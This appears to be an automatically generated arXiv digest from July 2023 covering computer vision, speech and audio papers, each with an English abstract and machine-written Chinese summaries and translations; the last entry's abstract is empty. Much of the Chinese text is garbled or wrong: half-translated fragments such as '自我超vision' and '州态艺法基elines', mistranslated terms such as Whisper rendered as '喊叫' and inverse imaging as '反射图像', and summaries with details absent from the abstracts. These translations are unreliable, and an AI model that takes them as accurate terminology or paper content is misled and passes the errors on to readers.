医学影像分割的标注缺乏问题使得深度学习模型的训练数据不够，这会导致模型在未见的数据域上不好地泛化。为了解决这个问题，域泛化（DG）技术被开发出来，以提高分割模型在未见的数据域上的性能。然而，DG设置需要多个源域，这阻碍了临床应用中的深度学习模型的有效部署。为了解决这个挑战并提高分割模型的泛化性，我们提出了一种新的方法：频率混合单源域泛化方法（FreeSDG）。通过分析频率对域差异的效果，FreeSDG利用混合频率谱来扩展单源域。此外，我们还构建了基于频率域的自我超vision来学习Context-aware表示。实验结果表明，FreeSDG方法可以高效地提高分割模型的泛化性。我们对五个数据集进行了五种modalities的实验，并证明FreeSDG方法可以与当前状态的方法相比，显著提高分割模型的泛化性。因此，FreeSDG方法提供了一种有效的解决医学影像分割模型的标注缺乏问题的方法，特别是当 annotated data scarce 时。代码可以在上获取。

Learned Scalable Video Coding For Humans and Machines

paper_url: http://arxiv.org/abs/2307.08978
repo_url: None
paper_authors: Hadi Hadizadeh, Ivan V. Bajić
for: 这个论文主要是为了支持自动视频分析，而不是人类视觉。
methods: 该论文使用了深度神经网络（DNN）来实现视频编码，并使用了 conditional coding 来提高压缩效果。
results: 实验结果表明，该系统在基层和优化层中都可以实现更好的压缩效果，并且可以在机器视觉任务和人类视觉任务之间进行可替换。

Abstract
Video coding has traditionally been developed to support services such as video streaming, videoconferencing, digital TV, and so on. The main intent was to enable human viewing of the encoded content. However, with the advances in deep neural networks (DNNs), encoded video is increasingly being used for automatic video analytics performed by machines. In applications such as automatic traffic monitoring, analytics such as vehicle detection, tracking and counting, would run continuously, while human viewing could be required occasionally to review potential incidents. To support such applications, a new paradigm for video coding is needed that will facilitate efficient representation and compression of video for both machine and human use in a scalable manner. In this manuscript, we introduce the first end-to-end learnable video codec that supports a machine vision task in its base layer, while its enhancement layer supports input reconstruction for human viewing. The proposed system is constructed based on the concept of conditional coding to achieve better compression gains. Comprehensive experimental evaluations conducted on four standard video datasets demonstrate that our framework outperforms both state-of-the-art learned and conventional video codecs in its base layer, while maintaining comparable performance on the human vision task in its enhancement layer. We will provide the implementation of the proposed system at www.github.com upon completion of the review process.

摘要
视频编码传统上是为服务如视频流式、视频会议、数字电视等服务开发的。主要目的是为人类观看编码内容。然而，随着深度神经网络（DNN）的发展，编码的视频已经在机器自动分析中得到了广泛的应用。例如，在自动交通监测应用中，机器可以通过视频分析来探测、跟踪和计数交通车辆。在这些应用中，人类只需 occasionally 查看可能的意外事件。为支持这些应用，我们需要一种新的视频编码 paradigma，可以帮助高效地表示和压缩视频，以便同时支持机器和人类的使用。在这篇论文中，我们介绍了首个可学习的视频编码器，其基层支持机器视觉任务，而增强层支持人类视觉输入重建。我们的系统基于 conditional coding 的概念，以实现更好的压缩收益。我们在四个标准视频数据集上进行了广泛的实验评估，并证明了我们的框架在基层上比现状 learned 和 conventional 视频编码器更高效，而且在人类视觉任务的增强层中保持了相似的性能。我们将在 GitHub 上提供实现的 propose 系统。

Deep Physics-Guided Unrolling Generalization for Compressed Sensing

paper_url: http://arxiv.org/abs/2307.08950
repo_url: https://github.com/guaishou74851/prl
paper_authors: Bin Chen, Jiechong Song, Jingfen Xie, Jian Zhang
for: 这篇论文主要是为了提出一种高精度且可解释的图像重建方法，兼顾了模型驱动和数据驱动方法的优点，以解决 inverse imaging зада题中的问题。
methods: 这篇论文提出了一种基于高维特征空间的Physics-guided unrolled recovery learning（PRL）框架，通过普通迭代法实现高精度的图像重建。此外，作者还提出了两种实现方式：PRL-PGD和PRL-RND。
results: 实验表明，PRL 网络比其他状态 искусственный方法具有显著的性能和效率优势，并且还有很大的应用前景，可以应用于其他 inverse imaging 问题或优化模型。

Abstract
By absorbing the merits of both the model- and data-driven methods, deep physics-engaged learning scheme achieves high-accuracy and interpretable image reconstruction. It has attracted growing attention and become the mainstream for inverse imaging tasks. Focusing on the image compressed sensing (CS) problem, we find the intrinsic defect of this emerging paradigm, widely implemented by deep algorithm-unrolled networks, in which more plain iterations involving real physics will bring enormous computation cost and long inference time, hindering their practical application. A novel deep $\textbf{P}$hysics-guided un$\textbf{R}$olled recovery $\textbf{L}$earning ($\textbf{PRL}$) framework is proposed by generalizing the traditional iterative recovery model from image domain (ID) to the high-dimensional feature domain (FD). A compact multiscale unrolling architecture is then developed to enhance the network capacity and keep real-time inference speeds. Taking two different perspectives of optimization and range-nullspace decomposition, instead of building an algorithm-specific unrolled network, we provide two implementations: $\textbf{PRL-PGD}$ and $\textbf{PRL-RND}$. Experiments exhibit the significant performance and efficiency leading of PRL networks over other state-of-the-art methods with a large potential for further improvement and real application to other inverse imaging problems or optimization models.

摘要
通过吸收模型和数据驱动方法的优点，深度物理参与学习方案实现高精度和可解释的图像重建。它在反射图像任务中吸引了越来越多的关注，成为主流。但是，对于图像压缩感知（CS）问题，我们发现了深度算法拆箱网络广泛实施的内在缺陷：更多的简单迭代 iterations 会带来巨大的计算成本和长时间推理时间，限制其实际应用。为解决这个问题，我们提出了一种深度物理指导的解析学习（PRL）框架，通过将传统的迭代回归模型从图像域（ID）扩展到高维特征域（FD），提高网络容量和保持实时推理速度。此外，我们还开发了一种嵌入式多尺度拆箱架构，以增强网络的扩展性和灵活性。为了实现PRL网络的实现，我们提出了两种实现方法：PRL-PGD和PRL-RND。首先，我们使用权值迭代（PGD）方法来实现PRL网络的迭代过程，其中每个迭代都是一个简单的PGD过程。其次，我们使用几何范围零空间分解（RND）方法来实现PRL网络的解析过程，这种方法可以快速地解决图像的缺失信息。实验结果表明，PRL网络在反射图像任务中表现出色，与其他当前最佳方法相比，具有显著的性能和效率优势，同时还有很大的潜在提升空间和实际应用前景。

Image Processing Methods Applied to Motion Tracking of Nanomechanical Buckling on SEM Recordings

paper_url: http://arxiv.org/abs/2307.08786
repo_url: None
paper_authors: Ege Erdem, Berke Demiralp, Hadi S Pisheh, Peyman Firoozy, Ahmet Hakan Karakurt, M. Selim Hanay
for: 这个论文是为了解决扫描电子显微镜（SEM）记录的动态纳米电romechanical系统（NEMS）的问题，因为噪声引起的低帧率、不足的分辨率和由应用的电 potential所引起的模糊。
methods: 这个论文使用了一种基于物理系统的图像处理算法，用于跟踪NEMS结构在高噪声水平下的动态运动。该算法包括一个图像滤波器、两个数据滤波器和一个非线性回归模型，利用物理解决方案的预期形式。
results: 该算法可以跟踪NEMS的动态运动和捕捉了压缩力对矩形杆的弯曲强度的依赖关系。通过该算法，可以清晰地分解NEMS在SEM记录中的转换从间隙弯曲到内隙弯曲的过程。

Abstract
The scanning electron microscope (SEM) recordings of dynamic nano-electromechanical systems (NEMS) are difficult to analyze due to the noise caused by low frame rate, insufficient resolution and blurriness induced by applied electric potentials. Here, we develop an image processing algorithm enhanced by the physics of the underlying system to track the motion of buckling NEMS structures in the presence of high noise levels. The algorithm is composed of an image filter, two data filters, and a nonlinear regression model, which utilizes the expected form of the physical solution. The method was applied to the recordings of a NEMS beam about 150 nm wide, undergoing intra-and inter-well post-buckling states with a transition rate of approximately 0.5 Hz. The algorithm can track the dynamical motion of the NEMS and capture the dependency of deflection amplitude on the compressive force on the beam. With the help of the proposed algorithm, the transition from inter-well to intra-well motion is clearly resolved for buckling NEMS imaged under SEM.

摘要
电子透镜记录动态纳米电romechanical系统（NEMS）具有较低的帧率、不够的分辨率和应用电压所引起的噪声，使得分析变得困难。在这种情况下，我们开发了一种基于系统物理学的图像处理算法，用于跟踪NEMS结构在高噪声水平下的动态运动。该算法包括一个图像滤波器、两个数据滤波器和一个非线性回归模型，其利用了系统物理学的预期解。该方法应用于一个宽约150nm的NEMS梁，在0.5Hz的过渡率下进行了内部和外部受压变换。该算法可以跟踪NEMS的动态运动和捕捉压缩力的影响于梁的折弯幅度。通过提posed algorithm，对buckling NEMS的图像进行了清晰的分辨和解决。

Implementation of a perception system for autonomous vehicles using a detection-segmentation network in SoC FPGA

paper_url: http://arxiv.org/abs/2307.08682
repo_url: https://github.com/vision-agh/mt_kria
paper_authors: Maciej Baczmanski, Mateusz Wasala, Tomasz Kryjak
for: 本研究旨在开发一种高效、实时、能效的自动驾驶感知控制系统，以满足不同道路条件下的障碍物识别和环境元素识别等功能要求。
methods: 本文使用MultiTaskV3检测分割网络作为感知系统的基础，并对其进行了适当的训练、量化和实现于AMD Xilinx Kria KV260 Vision AI嵌入式平台。通过这种设备，可以并行加速计算，同时减少能耗。
results: 实验结果显示，该系统在对象检测和图像分割方面具有高度准确性（mAP大于97%和mIoU大于90%），并且在实时性和能效性方面也具有优异表现。

Abstract
Perception and control systems for autonomous vehicles are an active area of scientific and industrial research. These solutions should be characterised by high efficiency in recognising obstacles and other environmental elements in different road conditions, real-time capability, and energy efficiency. Achieving such functionality requires an appropriate algorithm and a suitable computing platform. In this paper, we have used the MultiTaskV3 detection-segmentation network as the basis for a perception system that can perform both functionalities within a single architecture. It was appropriately trained, quantised, and implemented on the AMD Xilinx Kria KV260 Vision AI embedded platform. By using this device, it was possible to parallelise and accelerate the computations. Furthermore, the whole system consumes relatively little power compared to a CPU-based implementation (an average of 5 watts, compared to the minimum of 55 watts for weaker CPUs, and the small size (119mm x 140mm x 36mm) of the platform allows it to be used in devices where the amount of space available is limited. It also achieves an accuracy higher than 97% of the mAP (mean average precision) for object detection and above 90% of the mIoU (mean intersection over union) for image segmentation. The article also details the design of the Mecanum wheel vehicle, which was used to test the proposed solution in a mock-up city.

摘要
自动驾驶车辆的感知和控制系统是科学技术和工业领域的活跃领域。这些解决方案应具备高效地认知障碍物和其他环境元素，实时性和能效性。实现这种功能需要适当的算法和适当的计算平台。在这篇论文中，我们使用了MultiTaskV3检测-分割网络作为感知系统的基础，可以同时完成这两个功能 within 一个架构。它被正确地训练、量化和在AMD Xilinx Kria KV260 Vision AI嵌入式平台上实现。通过使用这个设备，可以并行化和加速计算。此外，整个系统的功耗相对较少，只有5瓦特，比较弱的CPU实现的最低功耗55瓦特，而且平台的尺寸（119mm x 140mm x 36mm）也很小，可以在空间有限的设备中使用。它还实现了对 объек detection的准确率高于97%的mAP，以及对图像分割的准确率高于90%的mIoU。文章还详细介绍了使用的Mecanum轮胎车，该车在模拟城市中测试了提议的解决方案。

2023-07-17

cs.SD

cs.SD - 2023-07-17

TST: Time-Sparse Transducer for Automatic Speech Recognition

paper_url: http://arxiv.org/abs/2307.08323
repo_url: None
paper_authors: Xiaohui Zhang, Mangui Liang, Zhengkun Tian, Jiangyan Yi, Jianhua Tao
for: 这篇论文主要是为了解决端到端模型，特别是循环神经网络推导器（RNN-T）在语音识别中的长序处理问题。
methods: 作者提出了一个名为时间叠 sparse 的模型，内置了时间叠 Mechanism。这个 Mechanism 通过将时间解析为更低的时间解析获得了中间表示，然后使用权重平均算法融合这些表示，以生成简单的隐藏状态。
results: 实验结果显示，与 RNN-T 相比，时间叠 transducer 的字元错误率几乎相同，并且实时因子为原始的 50%。通过调整时间解析，时间叠 transducer 可以降低实时因子至原始的 16.54%，但是这需要付出一些精度的损失（4.94%）。

Abstract
End-to-end model, especially Recurrent Neural Network Transducer (RNN-T), has achieved great success in speech recognition. However, transducer requires a great memory footprint and computing time when processing a long decoding sequence. To solve this problem, we propose a model named time-sparse transducer, which introduces a time-sparse mechanism into transducer. In this mechanism, we obtain the intermediate representations by reducing the time resolution of the hidden states. Then the weighted average algorithm is used to combine these representations into sparse hidden states followed by the decoder. All the experiments are conducted on a Mandarin dataset AISHELL-1. Compared with RNN-T, the character error rate of the time-sparse transducer is close to RNN-T and the real-time factor is 50.00% of the original. By adjusting the time resolution, the time-sparse transducer can also reduce the real-time factor to 16.54% of the original at the expense of a 4.94% loss of precision.

摘要
endpoint模型，特别是Recurrent Neural Network Transducer (RNN-T)，在语音识别中取得了很大成功。然而，抽取器需要较大的内存占用量和计算时间，特别是处理长度较长的解码序列。为解决这个问题，我们提出了一种模型，即时间稀缺抽取器（Time-Sparse Transducer）。在这种机制中，我们通过减少隐藏状态的时间分辨率来获得中间表示。然后，我们使用权重平均算法将这些表示与解码器结合。在使用AISHELL-1 dataset进行所有实验后，我们发现，相比RNN-T，时间稀缺抽取器的字符错误率几乎相同，实时因子为原始的50.00%。通过调整时间分辨率，时间稀缺抽取器还可以降低实时因子至原始的16.54%，同时付出了4.94%的精度损失。

ivrit.ai: A Comprehensive Dataset of Hebrew Speech for AI Research and Development

paper_url: http://arxiv.org/abs/2307.08720
repo_url: https://github.com/yairl/ivrit.ai
paper_authors: Yanir Marmor, Kinneret Misgav, Yair Lifshitz
for: 提高希伯来语自动语音识别技术的研究和开发
methods: 使用了3,300小时的希伯来语音数据，包括1,000多个不同的说话人，并提供了不同的研究需求的三种数据形式：原始未处理的音频数据、后Voice Activity Detection的数据，以及部分转写的数据
results: 提供了一个大量的希伯来语音数据资源，可以免费使用，对研究人员、开发者和商业机构都是一个重要的资源，可以推进希伯来语言在人工智能技术中的发展

Abstract
We introduce "ivrit.ai", a comprehensive Hebrew speech dataset, addressing the distinct lack of extensive, high-quality resources for advancing Automated Speech Recognition (ASR) technology in Hebrew. With over 3,300 speech hours and a over a thousand diverse speakers, ivrit.ai offers a substantial compilation of Hebrew speech across various contexts. It is delivered in three forms to cater to varying research needs: raw unprocessed audio; data post-Voice Activity Detection, and partially transcribed data. The dataset stands out for its legal accessibility, permitting use at no cost, thereby serving as a crucial resource for researchers, developers, and commercial entities. ivrit.ai opens up numerous applications, offering vast potential to enhance AI capabilities in Hebrew. Future efforts aim to expand ivrit.ai further, thereby advancing Hebrew's standing in AI research and technology.

摘要
我们介绍“ivrit.ai”，一个全面的希伯来语 speech dataset，填补了希伯来语自动语音识别（ASR）技术的缺乏丰富资源。该dataset包含了超过3,300小时的希伯来语 speech，来自超过1,000名多样化的说话者，覆盖了不同的场景。它提供了三种形式来满足不同的研究需求：原始的未处理音频数据，经过语音活动检测后的数据，以及部分转写的数据。该dataset的legal accessible，即可免费使用，因此成为了研究人员、开发者和商业机构的重要资源。“ivrit.ai”开启了许多应用程序，具有很大的潜力提高希伯来语AI技术。未来努力将ivrit.ai继续扩展，以提高希伯来语在AI研究和技术中的地位。

BASS: Block-wise Adaptation for Speech Summarization

paper_url: http://arxiv.org/abs/2307.08217
repo_url: None
paper_authors: Roshan Sharma, Kenneth Zheng, Siddhant Arora, Shinji Watanabe, Rita Singh, Bhiksha Raj
for: 本研究旨在提高端到端speech summarization的性能，但现有模型受限于计算能力，因此通常只能使用宽度有限的输入序列进行训练。
methods: 本研究提出了一种逐块训练摘要模型的方法，通过分割输入序列进行批处理，以便在不同块之间传递语义上下文。
results: 实验结果表明，采用逐块训练方法可以提高ROUGE-L指标的表现，相比于 truncated input 基准值，提高了3个绝对点。

Abstract
End-to-end speech summarization has been shown to improve performance over cascade baselines. However, such models are difficult to train on very large inputs (dozens of minutes or hours) owing to compute restrictions and are hence trained with truncated model inputs. Truncation leads to poorer models, and a solution to this problem rests in block-wise modeling, i.e., processing a portion of the input frames at a time. In this paper, we develop a method that allows one to train summarization models on very long sequences in an incremental manner. Speech summarization is realized as a streaming process, where hypothesis summaries are updated every block based on new acoustic information. We devise and test strategies to pass semantic context across the blocks. Experiments on the How2 dataset demonstrate that the proposed block-wise training method improves by 3 points absolute on ROUGE-L over a truncated input baseline.

摘要
听力摘要可以提高模型性能，但是训练在极长输入（多个分钟或小时）上受到计算限制，因此通常使用剪辑模型输入。剪辑会导致模型较差，我们的解决方案是使用块式模型，即在输入块中进行处理。在这篇论文中，我们开发了一种可以在极长序列上逐步训练摘要模型的方法。我们将听力摘要视为流动的过程，每个块基于新的听音信息更新假设摘要。我们还提出了将语义上下文传递到块中的策略。在How2 dataset上进行了实验，并证明了我们的块式训练方法可以与 truncated input 基准相比提高约3个绝对 ROUGE-L 分数。

Exploring Binary Classification Loss For Speaker Verification

paper_url: http://arxiv.org/abs/2307.08205
repo_url: https://github.com/hunterhuan/sphereface2_speaker_verification
paper_authors: Bing Han, Zhengyang Chen, Yanmin Qian
for: 这个论文旨在提高speaker verification任务中的表现，减少因为训练和评估频道的差异所导致的性能下降。
methods: 这个论文使用了多个二元分类器来训练speaker模型，而不是传统的多类别分类法，以提高表现的稳定性和精度。
results: 实验结果显示，SphereFace2方法可以优化speaker模型的表现，特别是在困难的实验中，并且可以与大margin fine-tuning策略相结合以获得更好的结果。此外，SphereFace2方法还表现出对于分类数据的耐读性，可以在半supervised训练 scenrio中实现更好的表现。

Abstract
The mismatch between close-set training and open-set testing usually leads to significant performance degradation for speaker verification task. For existing loss functions, metric learning-based objectives depend strongly on searching effective pairs which might hinder further improvements. And popular multi-classification methods are usually observed with degradation when evaluated on unseen speakers. In this work, we introduce SphereFace2 framework which uses several binary classifiers to train the speaker model in a pair-wise manner instead of performing multi-classification. Benefiting from this learning paradigm, it can efficiently alleviate the gap between training and evaluation. Experiments conducted on Voxceleb show that the SphereFace2 outperforms other existing loss functions, especially on hard trials. Besides, large margin fine-tuning strategy is proven to be compatible with it for further improvements. Finally, SphereFace2 also shows its strong robustness to class-wise noisy labels which has the potential to be applied in the semi-supervised training scenario with inaccurate estimated pseudo labels. Codes are available in https://github.com/Hunterhuan/sphereface2_speaker_verification

摘要
通常情况下，靠近集训练和开集测试之间的差异会导致语音识别任务的性能下降。现有的损失函数和多类划分方法都会受到有效对的搜索的限制，而且在未seen speaker上测试时通常会出现下降。在这种情况下，我们引入了SphereFace2框架，它使用多个二分类器来训练说话者模型，而不是进行多类划分。这种学习模式可以有效地减少训练和评估之间的差距。在Voxceleb上进行的实验表明，SphereFace2可以比其他损失函数更高效地处理hard trial。此外，大margin精细调整策略与之相容，可以进一步提高性能。最后，SphereFace2还表明其强大的鲁棒性，可以在类别噪声标签的情况下进行 semi-supervised 训练。代码可以在https://github.com/Hunterhuan/sphereface2_speaker_verification 中找到。

2023-07-17

eess.AS

eess.AS - 2023-07-17

Dynamic Kernel Convolution Network with Scene-dedicate Training for Sound Event Localization and Detection

paper_url: http://arxiv.org/abs/2307.08239
repo_url: None
paper_authors: Siwei Huang, Jianfeng Chen, Jisheng Bai, Yafei Jia, Dongzhe Zhang
for: 这篇论文的目的是提出一种高效的声事件地理位置检测和检测系统，用于真实的空间声场。
methods: 该系统使用动态核心 convolution 模块来适应不同的感知范围，以及 SELDnet 和 EINv2 框架。此外，在训练阶段，还引入了两种场景专门的策略以提高系统在真实空间声场中的通用性。
results: 实验结果表明，提出的系统在 Sony-TAu 真实空间声场 dataset 上的表现出色，并超过了 fixes-kernel convolution SELD 系统。此外，该系统在 DCASE SELD 任务中获得了0.348的 SELD 分数，超过了 State-of-the-Art 方法。

Abstract
DNN-based methods have shown high performance in sound event localization and detection(SELD). While in real spatial sound scenes, reverberation and the imbalanced presence of various sound events increase the complexity of the SELD task. In this paper, we propose an effective SELD system in real spatial scenes.In our approach, a dynamic kernel convolution module is introduced after the convolution blocks to adaptively model the channel-wise features with different receptive fields. Secondly, we incorporate the SELDnet and EINv2 framework into the proposed SELD system with multi-track ACCDOA. Moreover, two scene-dedicated strategies are introduced into the training stage to improve the generalization of the system in realistic spatial sound scenes. Finally, we apply data augmentation methods to extend the dataset using channel rotation, spatial data synthesis. Four joint metrics are used to evaluate the performance of the SELD system on the Sony-TAu Realistic Spatial Soundscapes 2022 dataset.Experimental results show that the proposed systems outperform the fixed-kernel convolution SELD systems. In addition, the proposed system achieved an SELD score of 0.348 in the DCASE SELD task and surpassed the SOTA methods.

摘要
使用 Deep Neural Network (DNN) 方法的 зву频事件localization和检测 (SELD) 表现非常高。然而，在实际空间声场中，吸收和各种声事件的不均衡存在，使得 SELD 任务变得更加复杂。在这篇论文中，我们提出了一个有效的 SELD 系统，用于实际空间声场中。我们的方法包括：1. 在卷积块后引入动态核心 convolution 模块，以自适应地处理不同感受场的通道特征。2. 将 SELDnet 和 EINv2 框架integrated 到我们的 SELD 系统中，并使用多轨迹 ACCDOA。3. 在训练阶段，引入了两种适应性战略，以提高系统在真实空间声场中的普适性。4. 使用数据扩展方法，将数据集扩展到更多的频率和空间数据。我们使用了四个联合评价指标来评价 SELD 系统在 Sony-TAu Realistic Spatial Soundscapes 2022 数据集上的性能。实验结果表明，我们的系统在固定核心 convolution SELD 系统上表现出色，并且在 DCASE SELD 任务中达到了最佳效果，超过了 State-of-the-Art 方法。

Adapting Large Language Model with Speech for Fully Formatted End-to-End Speech Recognition

paper_url: http://arxiv.org/abs/2307.08234
repo_url: https://github.com/openai/whisper
paper_authors: Shaoshi Ling, Yuxuan Hu, Shuangbei Qian, Guoli Ye, Yao Qian, Yifan Gong, Ed Lin, Michael Zeng
for: 这个论文的目的是提高端到端语音识别（E2E ASR）模型的性能。
methods: 这个论文使用了预训练的大型语言模型（LLMs）来改进E2E ASR模型的性能。
results: 该方法可以有效地利用预训练的LLMs来生成更易读的ASR转录。对于具有不同领域的完整E2E ASR转录任务，我们的模型可以超越强大的ASR模型，如Whisper，在识别错误率方面。

Abstract
Most end-to-end (E2E) speech recognition models are composed of encoder and decoder blocks that perform acoustic and language modeling functions. Pretrained large language models (LLMs) have the potential to improve the performance of E2E ASR. However, integrating a pretrained language model into an E2E speech recognition model has shown limited benefits due to the mismatches between text-based LLMs and those used in E2E ASR. In this paper, we explore an alternative approach by adapting a pretrained LLMs to speech. Our experiments on fully-formatted E2E ASR transcription tasks across various domains demonstrate that our approach can effectively leverage the strengths of pretrained LLMs to produce more readable ASR transcriptions. Our model, which is based on the pretrained large language models with either an encoder-decoder or decoder-only structure, surpasses strong ASR models such as Whisper, in terms of recognition error rate, considering formats like punctuation and capitalization as well.

摘要
大多数端到端（E2E）语音识别模型由编码和解码块组成，这些块执行音频和语言模型功能。预训练大型语言模型（LLMs）有可能提高E2E ASR的性能。然而，将预训练语言模型与E2E语音识别模型结合使用显示有限的好处，这主要是因为文本基于的LLMs与E2E ASR中使用的模型之间存在差异。在这篇论文中，我们探讨一种替代方法，即适应预训练LLMs到语音。我们的实验表明，我们的方法可以有效地利用预训练LLMs的优势，生成更易读的ASR讯号。我们的模型基于预训练大型语言模型，可以是编码-解码结构或解码 только结构，在各个领域的完全格式E2E ASR转写任务中表现出色，胜过如喊叫等强大ASR模型。

2023-07-17

cs.CV

cs.CV - 2023-07-17

Identity-Preserving Aging of Face Images via Latent Diffusion Models

paper_url: http://arxiv.org/abs/2307.08585
repo_url: None
paper_authors: Sudipta Banerjee, Govind Mittal, Ameya Joshi, Chinmay Hegde, Nasir Memon
for: 这个论文是为了提高自动人脸识别系统的性能而写的。
methods: 这个论文使用了文本到图像扩散模型来 sintetically 年轻和年老人脸图像。
results: 这个方法可以通过几个尝试的训练来实现高度的视觉实际性和生物度的精度。在两个标准测试集（CelebA和AgeDB）上，这个方法比现有的状态调学基eline减少了约44%的False Non-Match Rate。

Abstract
The performance of automated face recognition systems is inevitably impacted by the facial aging process. However, high quality datasets of individuals collected over several years are typically small in scale. In this work, we propose, train, and validate the use of latent text-to-image diffusion models for synthetically aging and de-aging face images. Our models succeed with few-shot training, and have the added benefit of being controllable via intuitive textual prompting. We observe high degrees of visual realism in the generated images while maintaining biometric fidelity measured by commonly used metrics. We evaluate our method on two benchmark datasets (CelebA and AgeDB) and observe significant reduction (~44%) in the False Non-Match Rate compared to existing state-of the-art baselines.

摘要
“自动人脸识别系统的表现必然受到人脸年龄变化的影响。然而，高质量的个人数据库，收集了几年，通常规模不大。在这项工作中，我们提议、训练和验证了使用潜在的文本到图像扩散模型来人工增加和减少人脸图像的年龄。我们的模型在几次训练后达到了高度的视觉实际性和生物特征准确度，而且通过直观的文本提示来控制。我们对两个标准数据集（CelebA和AgeDB）进行评估，与现有的州态艺法基elines进行比较， Observation False Non-Match Rate 下降约44%。”Note: Please keep in mind that the translation is in Simplified Chinese, which is used in mainland China and Singapore, while Traditional Chinese is used in Taiwan, Hong Kong, and other countries.

Scale-Aware Modulation Meet Transformer

paper_url: http://arxiv.org/abs/2307.08579
repo_url: https://github.com/afeng-x/smt
paper_authors: Weifeng Lin, Ziheng Wu, Jiayu Chen, Jun Huang, Lianwen Jin
For: The paper proposes a new vision Transformer called Scale-Aware Modulation Transformer (SMT) that can handle various downstream tasks efficiently by combining convolutional networks and vision Transformers.* Methods: The proposed SMT includes two novel designs: Multi-Head Mixed Convolution (MHMC) and Scale-Aware Aggregation (SAA) modules. These modules enhance convolutional modulation and allow the network to capture multi-scale features and fuse information effectively.* Results: The proposed SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks, including image classification, object detection, and semantic segmentation. Specifically, SMT achieves 82.2% and 84.3% top-1 accuracy on ImageNet-1K, and outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO for object detection and 2.0 and 1.1 mIoU on ADE20K for semantic segmentation.

Abstract
This paper presents a new vision Transformer, Scale-Aware Modulation Transformer (SMT), that can handle various downstream tasks efficiently by combining the convolutional network and vision Transformer. The proposed Scale-Aware Modulation (SAM) in the SMT includes two primary novel designs. Firstly, we introduce the Multi-Head Mixed Convolution (MHMC) module, which can capture multi-scale features and expand the receptive field. Secondly, we propose the Scale-Aware Aggregation (SAA) module, which is lightweight but effective, enabling information fusion across different heads. By leveraging these two modules, convolutional modulation is further enhanced. Furthermore, in contrast to prior works that utilized modulations throughout all stages to build an attention-free network, we propose an Evolutionary Hybrid Network (EHN), which can effectively simulate the shift from capturing local to global dependencies as the network becomes deeper, resulting in superior performance. Extensive experiments demonstrate that SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks. Specifically, SMT with 11.5M / 2.4GFLOPs and 32M / 7.7GFLOPs can achieve 82.2% and 84.3% top-1 accuracy on ImageNet-1K, respectively. After pretrained on ImageNet-22K in 224^2 resolution, it attains 87.1% and 88.1% top-1 accuracy when finetuned with resolution 224^2 and 384^2, respectively. For object detection with Mask R-CNN, the SMT base trained with 1x and 3x schedule outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO, respectively. For semantic segmentation with UPerNet, the SMT base test at single- and multi-scale surpasses Swin by 2.0 and 1.1 mIoU respectively on the ADE20K.

摘要
In contrast to prior works that use modulations throughout all stages to build an attention-free network, the proposed Evolutionary Hybrid Network (EHN) can effectively simulate the shift from capturing local to global dependencies as the network becomes deeper, resulting in superior performance.Extensive experiments show that SMT significantly outperforms existing state-of-the-art models across a wide range of visual tasks. Specifically, SMT with 11.5M parameters and 2.4GFLOPs can achieve 82.2% top-1 accuracy on ImageNet-1K, while SMT with 32M parameters and 7.7GFLOPs can achieve 84.3% top-1 accuracy. After pretraining on ImageNet-22K in 224^2 resolution, the model can achieve 87.1% and 88.1% top-1 accuracy when finetuned with resolution 224^2 and 384^2, respectively.In object detection with Mask R-CNN, the SMT base trained with 1x and 3x schedule outperforms the Swin Transformer counterpart by 4.2 and 1.3 mAP on COCO, respectively. For semantic segmentation with UPerNet, the SMT base test at single- and multi-scale surpasses Swin by 2.0 and 1.1 mIoU, respectively, on the ADE20K.

On the Fly Neural Style Smoothing for Risk-Averse Domain Generalization

paper_url: http://arxiv.org/abs/2307.08551
repo_url: https://github.com/akshaymehra24/riskaversedg
paper_authors: Akshay Mehra, Yunbei Zhang, Bhavya Kailkhura, Jihun Hamm
For: 该论文目的是提出一种测试时 neural style smoothing（TT-NSS）方法，以提高预测不同域的风险敏感性。* Methods: 该方法使用一个“风格平滑”的 DG 分类器进行测试时预测，并使用 neural style transfer 模块来快速地在测试图像上实现风格平滑。* Results: 实验结果表明，TT-NSS 和 NSS 可以提高 DG 分类器在未经见过的域上的预测精度和风险敏感性。

Abstract
Achieving high accuracy on data from domains unseen during training is a fundamental challenge in domain generalization (DG). While state-of-the-art DG classifiers have demonstrated impressive performance across various tasks, they have shown a bias towards domain-dependent information, such as image styles, rather than domain-invariant information, such as image content. This bias renders them unreliable for deployment in risk-sensitive scenarios such as autonomous driving where a misclassification could lead to catastrophic consequences. To enable risk-averse predictions from a DG classifier, we propose a novel inference procedure, Test-Time Neural Style Smoothing (TT-NSS), that uses a "style-smoothed" version of the DG classifier for prediction at test time. Specifically, the style-smoothed classifier classifies a test image as the most probable class predicted by the DG classifier on random re-stylizations of the test image. TT-NSS uses a neural style transfer module to stylize a test image on the fly, requires only black-box access to the DG classifier, and crucially, abstains when predictions of the DG classifier on the stylized test images lack consensus. Additionally, we propose a neural style smoothing (NSS) based training procedure that can be seamlessly integrated with existing DG methods. This procedure enhances prediction consistency, improving the performance of TT-NSS on non-abstained samples. Our empirical results demonstrate the effectiveness of TT-NSS and NSS at producing and improving risk-averse predictions on unseen domains from DG classifiers trained with SOTA training methods on various benchmark datasets and their variations.

摘要
Specifically, the style-smoothed classifier predicts the most probable class based on the DG classifier's predictions on random re-stylizations of the test image. TT-NSS uses a neural style transfer module to stylize the test image on the fly, requires only black-box access to the DG classifier, and abstains when the DG classifier's predictions on the stylized test images lack consensus. Additionally, we propose a neural style smoothing (NSS) based training procedure that can be integrated with existing DG methods. This procedure enhances prediction consistency, improving the performance of TT-NSS on non-abstained samples.Our empirical results show that TT-NSS and NSS are effective in producing and improving risk-averse predictions on unseen domains for DG classifiers trained with state-of-the-art methods on various benchmark datasets and their variations.

Improving Data Efficiency for Plant Cover Prediction with Label Interpolation and Monte-Carlo Cropping

paper_url: http://arxiv.org/abs/2307.08559
repo_url: None
paper_authors: Matthias Körschens, Solveig Franziska Bucher, Christine Römermann, Joachim Denzler
for: 这个论文主要针对的是如何使用自动摄像头系统和深度学习算法对植被plot进行自动分类。methods: 这篇论文使用了自动摄像头系统收集高分辨率图像，然后使用深度学习算法对图像进行分类。另外，论文还引入了一种新的 Monte-Carlo Cropping 方法，用于处理高分辨率图像，并且可以增加训练数据集的大小。results: 论文的实验结果表明，使用自动摄像头系统和深度学习算法可以对植被plot进行高精度的自动分类，并且可以提高种类、社区和分割指标。此外， Monte-Carlo Cropping 方法也能够提高训练数据集的大小和模型的性能。

Abstract
